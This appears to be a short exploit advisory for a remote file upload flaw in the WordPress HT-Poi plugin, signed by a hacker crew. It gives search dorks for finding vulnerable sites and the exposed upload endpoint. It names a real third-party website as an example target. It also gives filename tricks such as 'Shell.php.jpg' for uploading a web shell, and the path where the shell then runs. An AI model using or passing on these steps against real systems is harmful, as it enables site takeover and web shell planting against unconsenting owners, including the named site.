WordPress HT-Poi plugin suffers from a shell upload vulnerability.
3fb2af3e738cdb064d384f11379a7b45c392cd8b485fd1dc53e86b2446642e27
-------------------- IN The NAme OF God --------------------
-====WordPress HT-Poi Plugin Remote File Uploader (RfU)====-
# Exploit Title: WordPress HT-Poi Plugin Remote File Uploader (RfU)
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://wordpress.org
# MAil : No0PM[at]yahoo[dot]com
-====Dork====-
inurl:/wp-content/plugins/HT-Poi/
inurl:/plugins/HT-Poi/
-====Exploit====-
http://Site.Com/wp-content/plugins/HT-Poi/file_upload.php
-====Example====-
http://acropoliselect.gr/wp-content/plugins/HT-Poi/file_upload.php
-====Load Sh3ll====-
http://acropoliselect.gr/wp-content/plugins/HT-Poi/upimages/Shell.php.jpg
-====information====-
Upload Your Shell ~~~> Shell.php Or Shell.php.jpg OR Shell.php;.jpg
Load Shell And Enjoye ~~~> wp-content/plugins/HT-Poi/upimages/Shell.php.jpg
-====Tnx To====-
Just Persian Gulf ~~~~ > W3 Are Persian Hackerz
MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members
iranhack.org